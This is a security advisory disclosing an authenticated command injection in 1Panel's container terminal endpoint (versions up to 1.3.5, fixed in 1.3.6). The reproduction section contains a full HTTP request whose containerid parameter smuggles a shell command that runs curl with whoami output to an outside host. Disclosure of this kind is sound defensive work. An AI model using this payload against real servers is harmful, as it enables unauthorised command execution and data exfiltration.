The authenticated attacker can craft a malicious payloads to achieve command injection when entering the container terminal.
Vulnerability analysis.
backend\app\api\v1\terminal.go#ContainerWsSsh
vulnerability reproduction.
GET /api/v1/containers/exec?cols=80&rows=24&containerid=/bin/bash||curl%20http://192.168.109.1:12345/`whoami`||&user=asd&command=/bin/bash HTTP/1.1
Host: 192.168.109.152:40982
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Sec-WebSocket-Version: 13
Origin: http://192.168.109.152:40982
Sec-WebSocket-Key: cOEWTRgkjxVppuhzAfOUWQ==
Connection: keep-alive, Upgrade
Cookie: rem-username=admin; psession=a6bcab14-d426-4cfe-8635-533e88b6f75e
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
The successful execution of system commands.
Affected versions: <= 1.3.5
The vulnerability has been fixed in v1.3.6.
It is recommended to upgrade the version to v1.3.6.
If you have any questions or comments about this advisory:
Open an issue in https://github.com/1Panel-dev/1Panel Email us at wanghe@fit2cloud.com
{ "nvd_published_at": "2023-07-05T21:15:09Z", "cwe_ids": [ "CWE-77" ], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2023-07-05T21:38:53Z" }